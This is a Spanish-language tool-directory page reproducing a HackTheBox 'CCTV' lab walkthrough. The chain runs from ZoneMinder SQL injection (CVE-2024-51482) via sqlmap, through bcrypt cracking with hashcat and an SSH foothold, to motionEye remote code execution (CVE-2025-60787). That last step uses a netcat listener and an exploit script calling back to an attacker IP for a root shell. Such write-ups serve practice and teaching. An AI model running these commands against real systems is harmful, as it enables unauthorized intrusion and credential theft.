Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/ledksv/cctv
Descifrado de ContraseñasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubledksv/cctv

cctv

Recorrido de HackTheBox CCTV encadenando la inyección SQL de ZoneMinder CVE-2024-51482, el cracking de hash bcrypt y el RCE de motionEye CVE-2025-60787 para obtener root.

hace 10h 49mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CCTV — HackTheBox Walkthrough

Plataforma: HackTheBox | SO: Linux

Cadena de ataque

Inyección SQL en ZoneMinder mediante CVE-2024-51482 extrae un hash bcrypt de la base de datos. Crackearlo con hashcat proporciona acceso SSH. Una instancia interna de motionEye expuesta mediante redirección de puertos es vulnerable a CVE-2025-60787 — proporciona una shell de root.

Enumeración

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

Se añadió cctv.htb a /etc/hosts. El puerto 80 alojaba una instalación de ZoneMinder.

CVE-2024-51482 — Inyección SQL en ZoneMinder

CVE-2024-51482 es una vulnerabilidad de inyección SQL en el endpoint de inicio de sesión de ZoneMinder. El parámetro username no está sanitizado, lo que permite la extracción de la base de datos.

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

Se extrajo un hash de contraseña bcrypt de la tabla users.

Crackeo del hash

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

Contraseña crackeada.

Foothold por SSH

root@kitploit:~
ssh <user>@10.129.53.160

User flag obtenida. Se comprobaron los servicios internos.

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

Se redirigió el puerto.

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — RCE en motionEye

CVE-2025-60787 es un RCE autenticado en motionEye. Con acceso al panel interno, se ejecutan comandos arbitrarios como root.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

Shell de root obtenida. Root flag en /root/root.txt.


Solo con fines educativos. Prueba únicamente sistemas que poseas o para los que tengas permiso explícito de prueba.

Descargar herramienta